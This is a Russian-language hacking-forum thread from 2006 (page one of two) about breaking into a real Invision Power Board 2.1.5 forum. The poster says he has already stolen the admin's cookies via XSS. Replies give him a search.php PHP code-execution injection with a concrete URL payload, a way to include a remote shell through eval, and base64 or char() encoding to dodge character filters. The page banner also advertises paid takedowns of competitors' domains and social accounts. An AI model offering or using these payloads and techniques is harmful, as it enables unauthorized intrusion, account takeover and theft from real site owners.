Форум АНТИЧАТ - Invision Board, замкнутый круг

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Invision Board, замкнутый круг

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Invision Board, замкнутый круг

31.05.2006, 19:21

FreeNet

Новичок

Регистрация: 24.12.2005

Сообщений: 8

Провел на форуме:
49112

Репутация: 1

Invision Board, замкнутый круг

У меня проблема: мне удалось украсть куки админа форума IPB v2.1.5 с помощью XSS, но хеш там с солью поэтому расшифровать его я не могу. А от SQL бага в search.php он пропадчен

Цитата:

IPB WARNING [2] preg_replace(): Unknown modifier '[' (Line: 1261 of /sources/action_public/search.php)

Можно ли как-нибудь узнать соль не имея доступа к Mysql?
Почитал темы про хеш с солью, но там все отвечают, что бесполезно.
Получается замкнутый круг: чтобы узнать соль и расшифровать пароль - нужен доступ к базе, а чтобы залить шелл и сдампить базу - нужно знать админский пас. Какой выход?

31.05.2006, 20:09

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

Провел на форуме:
5957900

Репутация: 561

Соль хранится именно там, следовательно без доступа никак.

Но.

Там в search ещё и выполнение php кода было, а это как-бы сразу шелл, без пароля.
http://forum.antichat.ru/thread18222.html

Да, и по моему, цитируемый тобою ответ не говорит о том, что форум пропатчен.

__________________
Full DNS report

01.06.2006, 09:54

nytros

Новичок

Регистрация: 05.01.2006

Сообщений: 29

Провел на форуме:
105157

Репутация: 0

Давай ссълку на форум взглянем.Можно и на ПМ.

01.06.2006, 14:27

FreeNet

Новичок

Регистрация: 24.12.2005

Сообщений: 8

Провел на форуме:
49112

Репутация: 1

Цитата:

Сообщение от Azazel

Но.
Там в search ещё и выполнение php кода было, а это как-бы сразу шелл, без пароля.
Да, и по моему, цитируемый тобою ответ не говорит о том, что форум пропатчен.

Пробовал ручками без сплоита: Вначале я создал сообщение с текстом

Цитата:

eval(phpinfo()); //

и своим тестом
Потом в поиске указал свой ник и текст eval.
форум благополучно вывел мое сообщение. К получившемуся урлу я добавил

Цитата:

&lastdate=z|eval.*?%20//)%23e%00

Вылетает таже ошибка, насколько я понял ipb ругается на присутствие символа '['. Может можно как-то это обойти?
Ладно если ничего не выйдет с самим форумом, то найду сайт на том же сервере с бажным phpBB или IPB (Полный путь к конфигу я знаю)

Последний раз редактировалось FreeNet; 01.06.2006 в 14:37..

02.06.2006, 23:22

nytros

Новичок

Регистрация: 05.01.2006

Сообщений: 29

Провел на форуме:
105157

Репутация: 0

Вот так можно попробовать eval(include(шифрованая ссълка на шел)
пост едит.Потом в search идем исчем eval.Найдеш в урл тогда можно добавить &lastdate=z|eval.*?%20//)%23e%00

02.06.2006, 23:37

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

Провел на форуме:
5957900

Репутация: 561

Знаю, но хрен скажу. Ты не должен использовать запрещённые в ipb символы. Да, уязвимомть это описана вдоль и поперёк, читай.

__________________
Full DNS report

09.07.2006, 13:08

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

nytros base64 тебе поможет

10.07.2006, 11:47

bl4ck-cat

Познающий

Регистрация: 17.06.2006

Сообщений: 76

Провел на форуме:
263627

Репутация: 32

не пробовал записать всё что внутри eval() в виде chаr?

10.07.2006, 16:08

~~add~~

Banned

Регистрация: 04.07.2006

Сообщений: 17

Провел на форуме:
86034

Репутация: 0

Цитата:

Сообщение от FreeNet

У меня проблема: мне удалось украсть куки админа форума IPB v2.1.5 с помощью XSS, но хеш там с солью поэтому расшифровать его я не могу. А от SQL бага в search.php он пропадчен

Можно ли как-нибудь узнать соль не имея доступа к Mysql?
Почитал темы про хеш с солью, но там все отвечают, что бесполезно.
Получается замкнутый круг: чтобы узнать соль и расшифровать пароль - нужен доступ к базе, а чтобы залить шелл и сдампить базу - нужно знать админский пас. Какой выход?

Не мог-бы дать мне код на XSS для IPB 2.1.5 плиз

#10

10.07.2006, 17:07

Sulf aka Joker

Участник форума

Регистрация: 03.07.2006

Сообщений: 110

Провел на форуме:
258848

Репутация: 27

Через репорт.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4	Ice_Fro$T	Форумы	19	18.11.2006 09:19
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос.	dukalis(AwP)	Форумы	14	19.04.2006 19:40
Эксплоит для Invision Power Board v2.1.3?	xdx	Форумы	8	08.02.2006 22:56
Invision Power Board <= 1.3.1 Login.PHP SQL Injection Как пользоваться?	GrisS	Форумы	16	02.02.2006 16:00

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход